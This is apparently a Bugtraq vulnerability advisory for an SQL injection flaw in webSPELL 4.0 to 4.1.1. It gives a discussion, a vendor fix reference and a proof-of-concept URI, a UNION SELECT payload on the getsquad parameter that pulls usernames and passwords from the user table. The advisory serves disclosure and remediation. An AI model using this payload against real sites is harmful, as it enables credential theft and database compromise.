WebSpell Index.PHP SQL Injection Vulnerability
BID:20540
Info
WebSpell Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 20540 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 16 2006 12:00AM |
| Updated: | Nov 06 2006 11:27PM |
| Credit: | trex is credited with the discovery of this vulnerability. |
| Vulnerable: |
webSPELL webSPELL 4.1.1 webSPELL webSPELL 4.1 webSPELL webSPELL 4.0 |
| Not Vulnerable: | |
Discussion
WebSpell Index.PHP SQL Injection Vulnerability
webSPELL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
webSPELL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
WebSpell Index.PHP SQL Injection Vulnerability
Attackers can exploit these issues via a web client.
The following proof-of-concept URI is available:
http://www.example.com/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*
Attackers can exploit these issues via a web client.
The following proof-of-concept URI is available:
http://www.example.com/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*
Solution / Fix
WebSpell Index.PHP SQL Injection Vulnerability
Solution:
The vendor has released a fix for this issue. Please see the references for details.
webSPELL webSPELL 4.1.1
Solution:
The vendor has released a fix for this issue. Please see the references for details.
webSPELL webSPELL 4.1.1
-
webSPELL SecurityFix 2006-09-08 VERSION 2
http://cms.webspell.org/download.php?fileID=11
References
WebSpell Index.PHP SQL Injection Vulnerability
References:
References:
- SecurityFix for known SQL injections (webSPELL)
- Vendor Home Page (webSPELL)